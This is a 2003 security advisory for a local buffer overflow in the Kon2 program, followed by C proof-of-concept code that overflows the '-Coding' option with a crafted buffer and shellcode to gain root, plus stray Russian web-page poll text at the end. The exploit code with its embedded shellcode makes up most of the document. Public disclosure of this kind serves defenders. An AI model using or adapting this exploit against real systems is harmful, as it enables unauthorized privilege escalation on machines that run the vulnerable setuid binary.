1

**********************************************************************

$ An open security advisory #1 - Kon2 root POC Code

*************************************************************************

1: Bug Researcher: c0ntex@hushmail.com

2: Bug Released: July 2003

3: Bug Impact Rate: Hi

4: Bug Scope Rate: Local

*************************************************************************

*************************************************************************

There exsists a local buffer overflow in Kon2 that will allow users the ability to gain root

access to the system. The bug is found in the "-Coding" option where data input is not checked

correctly.

Bug discovered by wszx - http://www.mail-archive.com/bugtraq@securityfocus.com/msg11681.html

*************************************************************************

$ Informed: N/A

$ Work around: Remove [+s] flag until a patch has been released.

*************************************************************************

*/

#include

#include

#include

#define NOP 0x90

#define RET 0xbffffffa

#define VULN "/usr/bin/kon"

#define MAXBUF 800

static char w00tI4r3l33t[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"

"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"

"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"

"\xff\xff/bin/id";

int main()

{

int i, *egg;

long retaddr;

static char buff[MAXBUF];

static char *sploit[0x02] = { w00tI4r3l33t, '\0' };

fprintf (stdout, "\n\n\n[ Some PoC code - local root exploit in %s ]\n", VULN);

fprintf (stdout, "[ For Linux RedHat v9 x86 - Ret_Addr 0xbffffffa ]\n\n\n\n");

if((retaddr = 0xbffffffa - strlen(w00tI4r3l33t) - strlen(VULN)) != 0x00) {

egg = (int *)(buff);

}

for(i = 0x00; i < MAXBUF; i += 0x04)

*(egg)++ = retaddr; *(egg) = NOP;

execl(VULN, VULN, "-Coding", buff, sploit, NULL);

return(0x00);

}


Ведете ли вы блог?

Да
Нет
Планирую


Результаты опроса

Новостной блок